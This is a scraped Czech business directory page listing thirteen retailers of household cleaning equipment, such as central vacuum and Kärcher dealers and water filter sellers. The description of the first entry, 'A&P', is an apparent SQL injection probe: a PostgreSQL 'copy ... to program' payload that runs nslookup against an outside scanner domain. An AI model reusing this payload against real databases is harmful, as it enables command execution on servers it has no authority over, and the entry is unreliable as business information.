rejstrikfirem.cz

logo RejstrikFirem.cz
TOPlist
WWW katalog (23) => Obchody a obchůdky (48) => Čistící technika pro bydlení (maloobchod) (4)
Maloobchodní prodejci čistící techniky pro domácnosti
Zobrazuji záznamy 1 až 13 z celkem 13.

A&P   [ Více info ]

Dovoz%20a%20prodej%20automobilu.‘;copy (select ‘‘) to program ‘nslookup dns.sqli.\013405.2371-5568.2371.c9b4b.\1.bxss.me

 

AWD Sdružení - Ing. Josef Dostál

Dovoz a prodej zařízení na úpravu vody. Záruční i pozáruční servis filtrů na vodu. Prodej a opravy UV lamp a zařízení na desinfekci vody. Prodej a montáž nových i repasovaných úpraven vody se zárukou.
web: http://
 

CENTRÁLNÍ VYSAVAČE ZLÍN - HUSKY A DISAN

Návrh, montáž, servis a maloobchodní i velkoobchodní prodej centrálních vysavačů značek HUSKY a DISAN. Regionální zástupce pro Zlínský kraj. Centrální vysavače do bytů, rodinných domů, penziónů a jiných komerčních, či průmyslových prostor.
web: http://www.stavel.com
 

Centrální vysavače Zlín - Ladislav Dohnálek

Návrhy, prodej, montáž a servis centrálních vysavačů pro byty, rodinné domy, penziony, hotely, kanceláře a průmyslové prostory. Regionální zastoupení značky Duo-Vac a Disan.
web: http://www.cvs.wgz.cz
 

Čistící stroje a úklidové pomůcky.

průmyslové vysavače, podlahové mycí stroje, vysokotlaké čistící stroje, komerční vysavače, úklidové vozíky, mopy, úklidové pomůcky, dávkovače mýdla, zásobníky ručníků a toal. papíru,
web: http://www.globaltek.cz
 

Eger Karel

prodej a servis čistícího systému Rainbow.
web: http://www.eger.cz
 

Falko F a L s.r.o.

Výroba plochých bavlněných mopů, plochých mikromopů, třásňových mopů, zametacích mopů, prodej malé úklidové techniky, úklidových hadříků a dalších pomůcek pro úklid, dovoz a prodej úklidové chemie.
web: http://falkofal.cz
 

Karcher profi internetový e-shop s karcher stroji a technikou

Prodej, servis, čistících strojů karcher, prodej tlakových mycích strojů, vysavačrů karcher, zametačů karcher, podlahových mycích strojů karcher, zametacích strojů karcher.
web: http://www.karcherprofi.cz
 

Karcher S+S s.r.o. - autorizovaný prodej, servis a eshop

Kärcher (Karcher- Kaercher) vše od hobby po profi techniku - vysokotlaká čistící technika, úklidová technika, vysavače, parní čističe, zavlažovací technika, čerpadla, čističky vod, traktory Kubota, topidla Power Tec a Steel mobile.
web: http://www.karchersas.cz
 

Kärcher S+S s.r.o. - autorizovaný prodej, servis a eshop

Kärcher vše od hobby po profesionální techniku - vysokotlaké čističe, úklidová technika, vysavače, parní čističe, zavlažovací technika, čerpadla, čističky vod, komunální technika Kubota, topidla Power Tec a Steel mobile
web: http://www.karchersas.cz
 

Sdružení Mýval

prodej a servis čistících strojů a úklidové techniky WAP a Nilfisk ALTO
web: http://www.myval.cz
 

Sinen s.r.o.

Prodej domácích spotřebičů do kuchyně a pro úklid formou přímého prodeje
web: http://www.sinen.cz
 

Voda zdarma

Filtry na dočišťování a zvýšení kvality pitné vody prostřednictvím aktivního uhlí a stříbra. Vynikající pro domácí i profesionální použití. Česká výroba - vysoká kvalita - bezkonkurenční cena.
web: http://www.voda-zdarma.com
 


PŘIDAT FIRMU DO:

Stránka vygenerována
za 0.12421 s